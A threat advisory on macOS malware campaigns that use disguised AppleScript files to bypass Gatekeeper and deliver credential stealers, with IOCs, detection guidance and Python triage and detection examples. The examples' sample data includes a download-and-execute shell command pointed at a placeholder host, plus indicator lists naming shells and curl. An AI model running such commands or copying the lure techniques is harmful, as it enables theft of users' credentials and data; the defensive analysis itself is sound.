AppleScript-Based Malware Campaign Bypasses Gatekeeper to Deliver macOS Stealers

November 18th, 2025

Severity: High

Our Cyber Threat Intelligence Unit has identified a growing macOS malware campaign exploiting AppleScript (.scpt) files to bypass Gatekeeper protections and distribute credential-stealing payloads. Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, threat actors have adopted new techniques that leverage trusted tooling such as Script Editor to execute malicious code under the guise of legitimate software updates and documents. These .scpt-based attacks are now delivering commodity stealer families, such as Odyssey Stealer and MacSync Stealer. They are also used in targeted campaigns such as NimDoor, with lures frequently masquerading as Zoom, Microsoft Teams, or Chrome updates. By tricking macOS users into manually running booby-trapped AppleScript files, adversaries are reliably achieving execution and data theft on macOS systems despite native protections. 

Technical Details

  • Attack Vector: Malicious AppleScript (.scpt) files distributed through fake update pages, phishing sites, Telegram channels, and ZIP/DMG archives masquerading as legitimate software or documents.

    • Files often use disguised names such as document.docx.scpt or slides.pptx.scpt, and carry custom icons embedded in the resource fork to mimic Office documents or installers.

  • Severity: High.

  • Execution Chain:

    • Victims download a malicious .scpt file disguised as a legitimate document or software update.

    • By default, double-clicking a .scpt opens it in Script Editor.app, a trusted macOS tool.

    • The script is padded with innocuous-looking comments and long runs of blank lines, pushing the actual payload out of view while instructing the user to click Run or press Command+R.

    • Upon execution, the AppleScript issues do shell script calls (often invoking /bin/bash, /bin/sh, or curl) to download or run additional payloads.

      • Payloads include stealers, backdoors, persistence installers, and reconnaissance scripts.

  • Evasion Techniques:

    • Custom icons and deceptive multi-extension filenames to disguise .scpt files.

    • Delivery via zip or dmg archives preserves icons and extended attributes.

    • Obfuscation using buried shell commands, AppleScript event codes, or minimized/hidden logic structures.

  • Associated Malware Families:

    • Odyssey Stealer: Exfiltrates browser credentials, documents, and cryptocurrency wallet data; commonly delivered via fake Zoom/Teams update chains.

    • MacSync Stealer: AppleScript-delivered successor to mac.c stealer; extracts credentials and wallet data, with newer variants pairing a Go-based backdoor.

    • NimDoor: A persistent macOS backdoor deployed through an AppleScript dropper disguised as a Zoom SDK update; loads C++ and Nim-compiled components for long-term access and data theft.

  • Distribution Channels:

    • Fake Zoom/Teams/Chrome update pages.

    • Phishing and impersonation websites.

    • Telegram distribution channels (noted in NimDoor campaigns).

    • Email-delivered ZIP/DMG archives containing disguised .scpt payloads.

Impact

  • AppleScript-delivered stealers such as Odyssey and MacSync can extract stored credentials, browser data, and potentially cryptocurrency wallet information.

  • Once executed, these AppleScript payloads can:

    • Launch shell commands to download and run additional Mach-O binaries (e.g., NimDoor’s C++ and Nim components).

    • Establish persistence (e.g., LaunchAgents, custom signal-handler logic in NimDoor) and maintain long-lived access.

    • Exfiltrate sensitive data (documents, browser stores, wallets) to remote C2 infrastructure.

  • The .scpt technique abuses Script Editor’s default handling, allowing malicious scripts to execute when users click Run, even for files marked quarantined by Gatekeeper.

  • Traditional AV detection of compiled AppleScript remains inconsistent; several .scpt samples documented in the research still show zero detections on VirusTotal.

Detection Method

  • Log & Execution Anomalies:

    • Monitor Script Editor.app or osascript spawning shells or network processes from Downloads, Desktop, or temporary directories.

    • Flag sequences where Script Editor is followed by curl, shell invocations, or access to browser profile paths.

  • AppleScript File Indicators:

    • .scpt, .scptd, or disguised files containing:

      • do shell script or embedded shell commands.

      • AppleScript event codes like sysoexec.

      • Excessive blank lines, comment padding, or misleading prompts.

    • Files with custom icons resembling Zoom, Teams, Chrome, Office documents, or installers.

  • Network & Payload Activity:

    • Monitor outbound connections following .scpt execution to the suspicious domains and IPs listed in the IOC section below.

    • Inspect recently downloaded files using xattr -l to identify quarantine attributes and unexpected execution.
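The file indicators above (multi-extension names, comment and blank-line padding, embedded shell commands and the sysoexec event code, "click Run / Command+R" prompts) as a small static triage routine. This is an added example, not tooling from the advisory or its authors; it works on raw bytes because compiled .scpt files are binary, the sample file name and contents are constructed, and the padding threshold is an assumed value to tune per environment.

```python
import re
from dataclasses import dataclass, field

# Indicators named in the advisory: "do shell script", the sysoexec event code,
# shell/curl invocations, and prompts urging the user to click Run / press Command+R.
# Compiled .scpt files are binary, so everything is matched on bytes.
SHELL_INDICATORS = [b"do shell script", b"sysoexec", b"/bin/bash", b"/bin/sh", b"curl "]
PROMPT_INDICATORS = [b"Command+R", b"click Run", b"press Run"]
DOC_EXTENSIONS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "pkg", "dmg", "app"}
SCRIPT_EXTENSIONS = {"scpt", "scptd", "applescript"}
PADDING_THRESHOLD = 20  # assumed: consecutive comment/blank lines that count as padding


@dataclass
class Triage:
    name: str
    multi_extension: bool = False
    max_padding_run: int = 0
    shell_hits: list = field(default_factory=list)
    prompt_hits: list = field(default_factory=list)

    @property
    def score(self) -> int:
        # One point per indicator class; two or more is worth an analyst's attention.
        return sum([
            self.multi_extension,
            self.max_padding_run >= PADDING_THRESHOLD,
            bool(self.shell_hits),
            bool(self.prompt_hits),
        ])


def is_multi_extension(name: str) -> bool:
    """document.docx.scpt: a script extension hiding behind a document extension."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] in SCRIPT_EXTENSIONS and parts[-2] in DOC_EXTENSIONS


def longest_padding_run(data: bytes) -> int:
    """Longest run of lines that are blank or AppleScript line comments (-- or #)."""
    run = best = 0
    for line in data.split(b"\n"):
        stripped = line.strip()
        if stripped == b"" or stripped.startswith((b"--", b"#")):
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def triage_file(name: str, data: bytes) -> Triage:
    t = Triage(name=name)
    t.multi_extension = is_multi_extension(name)
    t.max_padding_run = longest_padding_run(data)
    t.shell_hits = [i.decode() for i in SHELL_INDICATORS if i in data]
    t.prompt_hits = [i.decode() for i in PROMPT_INDICATORS if i in data]
    return t


# Constructed sample mimicking the lure described above (not a real malware file):
# a fake "update" with a Command+R prompt, hundreds of blank lines, then the payload.
SAMPLE_NAME = "document.docx.scpt"
SAMPLE_DATA = (
    b"-- Zoom SDK update helper\n"
    b"-- To apply the update, click Run or press Command+R\n"
    + b"\n" * 400
    + b'do shell script "curl -s http://placeholder.invalid/x -o /tmp/.x; /bin/sh /tmp/.x"\n'
)

if __name__ == "__main__":
    result = triage_file(SAMPLE_NAME, SAMPLE_DATA)
    print(f"{result.name}: score={result.score} multi_ext={result.multi_extension} "
          f"padding={result.max_padding_run} shell={result.shell_hits} prompt={result.prompt_hits}")
```

The indicator strings are cheap to evade, so treat the score as a triage priority for files arriving in Downloads or mail attachments rather than as a verdict; pair it with the process-chain monitoring described above.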

Indicators of Compromise

Type            Indicator
SHA-256 Hash    f5b4fec2263950ca5cfac9f9d060bb96f6323fcb908b09eedb7996c107bdcf5a
SHA-256 Hash    99cfb160a2453a22cc025fe0afc21d660744205eff2885836d8e543fda50f06d
SHA-256 Hash    6149bacfb02eb3db6f95947bc57d89bfb92b90f16f92a61266ea6fbec81d10b7
SHA-256 Hash    2e2cedbf1f09208ee7dad6ac5dec96e97bc0c41a31e190bc41e14f2929c05d4c
SHA-256 Hash    b489039b502afd8b8267853c4d2cf65f75b76aa1f128f13d332f7d26ffcbd114
SHA-256 Hash    14aba88b5f87ab9415bbca855d24abc3f151b819302930897e71e2626e823271
SHA-256 Hash    580f6dd3f4cb78f80167a3d980bab3590dca877d78bb4e17360dc50fdbef7692
SHA-256 Hash    a7c7d75c33aa809c231f1b22521ae680248986c980b45aa0881e19c19b7b1892
SHA-256 Hash    8e897a1e0c3092a7a8f8c3946da6ef23f013dd7633bdea185d15f6ea9c902ef0
SHA-256 Hash    24ba8e79bd22ece03fc7cd0b00822a38ecec146dc5c70404476110a4028c9caf
SHA-256 Hash    2f99de308882fb9a6686913c4f6cc6654e75eb861d39a9ce33ae23c2d11271ec
SHA-256 Hash    f9f9ac24381acad8957724b6aacb0a7fe83d9359c6b7ceded10b2c8e2f4a729b
SHA-256 Hash    43e2681212b6324c6087d78e8c30313e199d42e4554e616c6880ed4c4f6bf088
SHA-256 Hash    b9c35bccb5ee635269780983265c40169e7c268f73f6e38651cc8efcaf13ed41
SHA-256 Hash    7f69f3012e134d1f5084fbb9086697da66a9b0e9240c4e1413777b9e1099aca9
SHA-256 Hash    6a95ab1e7a94fb55a1789f5dfb0fb98237ac72d14ae89ac557101a6176826610
SHA-256 Hash    03458265a47dd655c7c6eccff7c273618f768f52ecf11db7fd67c857b1eca0cd
SHA-256 Hash    9f3a2876f29b336f4372e3c0be26cecaa2966bc5ef5bf2403cb6354ddb87691a
SHA-256 Hash    e41efd9eeb08571b4322433df84f81d660ce2fc1ba24134ff14a58a06cd2436b
SHA-256 Hash    fbea68ff0dc10f85e859ad09c02c1fea4b85d58e80d8a68af7e93f4a1443b34b
Domain & IP     endesway[.]life → 185.93.89[.]62
Domain & IP     customizetion[.]com → 192.140.161[.]143
Domain & IP     support.ms-live[.]com → 124.132.136[.]17
Domain & IP     uk06webzoom[.]us → 114.66.50[.]134
Domain          uk04webzoom[.]us
Domain          foldgalaxy[.]com
Domain          forestnumb[.]top
Domain          elbrone[.]com
Domain          globalnetman[.]xyz
Domain          aubr[.]io
Domain          dosmac[.]top


Recommendations

  • Restrict Script Execution:

    • Change the default application for .scpt files from Script Editor to a non-executable viewer.

    • Restrict user ability to run osascript or Script Editor in high-security environments.

  • User Awareness:

    • Train users not to open .scpt files or run Script Editor prompts originating from downloads or unsolicited archives.

    • Emphasize risks of multi-extension filenames (e.g., *.docx.scpt).

  • Email & File Filtering:

    • Block or quarantine unsolicited .scpt, .zip, and .dmg attachments at email gateways.

  • Network Monitoring:

    • Monitor for outbound connections to domains and IPs listed in this advisory.

    • Alert on Script Editor spawning network processes.

  • Endpoint Monitoring:

    • Detect Script Editor → shell → curl process chains.

    • Inspect downloaded files using xattr -l to verify quarantine status.

  • Backup & Patch Hygiene:

    • Maintain offline or immutable backups.

    • Apply macOS and XProtect updates promptly as Apple refines detection heuristics for AppleScript abuse.
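The Script Editor → shell → curl chain and browser-profile access called for in the endpoint-monitoring bullets, as an added Python example that is not from the advisory or its authors. It walks parent/child relationships in constructed process-start events (a simple key='value' line format standing in for EDR telemetry; the pids, paths, timestamps and the placeholder URL are all made up) and raises an alert only for shells, network tools, or browser-profile access that descend from Script Editor or osascript, so an ordinary Terminal → zsh → curl session stays quiet.

```python
import os
import re

# Constructed process-start events in a simple key='value' line format. This is
# not real macOS/EDR telemetry; point parse_events() at your own export format.
SAMPLE_EVENTS = """\
ts='2025-11-18T10:02:11Z' pid='501' ppid='1' exe='/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor' cwd='/Users/alice' argv='Script Editor /Users/alice/Downloads/document.docx.scpt'
ts='2025-11-18T10:02:40Z' pid='523' ppid='501' exe='/bin/sh' cwd='/Users/alice/Downloads' argv='sh -c curl -s http://placeholder.invalid/x -o /tmp/.x; /bin/sh /tmp/.x'
ts='2025-11-18T10:02:41Z' pid='524' ppid='523' exe='/usr/bin/curl' cwd='/Users/alice/Downloads' argv='curl -s http://placeholder.invalid/x -o /tmp/.x'
ts='2025-11-18T10:03:05Z' pid='530' ppid='523' exe='/bin/sh' cwd='/tmp' argv='/bin/sh /tmp/.x'
ts='2025-11-18T10:03:06Z' pid='531' ppid='530' exe='/bin/ls' cwd='/tmp' argv='ls /Users/alice/Library/Application Support/Google/Chrome/Default'
ts='2025-11-18T10:10:00Z' pid='600' ppid='1' exe='/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal' cwd='/Users/alice' argv='Terminal'
ts='2025-11-18T10:10:05Z' pid='601' ppid='600' exe='/bin/zsh' cwd='/Users/alice' argv='zsh -l'
ts='2025-11-18T10:10:20Z' pid='602' ppid='601' exe='/usr/bin/curl' cwd='/Users/alice/src' argv='curl -s https://example.com/'
"""

SCRIPT_HOSTS = {"Script Editor", "osascript"}
SHELLS = {"sh", "bash", "zsh"}
NETWORK_TOOLS = {"curl", "wget"}
USER_DIRS = ("/Downloads", "/Desktop", "/tmp", "/private/tmp", "/var/folders")
BROWSER_PATHS = (
    "Library/Application Support/Google/Chrome",
    "Library/Application Support/Firefox",
    "Library/Application Support/BraveSoftware",
    "Library/Safari",
)


def parse_events(text):
    """Parse key='value' lines into dicts with ts, pid, ppid, exe, cwd, argv."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(re.findall(r"(\w+)='([^']*)'", line)))
    return events


def script_host_ancestor(procs, pid):
    """Walk the ppid chain; return the nearest Script Editor/osascript ancestor, or None."""
    seen = set()
    ppid = procs[pid]["ppid"]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        if os.path.basename(procs[ppid]["exe"]) in SCRIPT_HOSTS:
            return procs[ppid]
        ppid = procs[ppid]["ppid"]
    return None


def detect(events):
    procs = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        host = script_host_ancestor(procs, e["pid"])
        if host is None:
            continue  # not descended from a script host: Terminal -> zsh -> curl stays quiet
        name = os.path.basename(e["exe"])
        if name in SHELLS:
            rule = "shell"
        elif name in NETWORK_TOOLS:
            rule = "network"
        elif any(p in e["argv"] for p in BROWSER_PATHS):
            rule = "browser-profile"
        else:
            continue
        alerts.append({
            "pid": e["pid"], "ts": e["ts"], "rule": rule, "exe": e["exe"],
            "script_host_pid": host["pid"],
            "script_host_argv": host["argv"],
            # Downloads/Desktop/temp locations raise the priority of the alert
            "from_user_dir": any(d in e["cwd"] or d in e["argv"] for d in USER_DIRS),
        })
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_EVENTS)):
        print(f"[{a['rule']}] pid={a['pid']} {a['exe']} under script host pid={a['script_host_pid']} "
              f"({a['script_host_argv']}) user_dir={a['from_user_dir']}")
```

Each alert carries the script host's own argv, so the responder sees the opened .scpt path (here a Downloads file with a doubled extension) without a second lookup; the same ancestor walk applies to osascript invoked from a LaunchAgent once persistence is in place.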

Conclusion

AppleScript-based malware delivery illustrates how macOS threat actors are rapidly adapting to post-Gatekeeper restrictions. By abusing trusted tools like Script Editor, embedding deceptive icons, and crafting convincing multi-extension lures, attackers are achieving consistent user-driven execution with minimal detection. We urge organizations to implement stricter execution policies, improve monitoring of Script Editor activity, and implement targeted filtering for disguised .scpt files to mitigate this evolving threat landscape.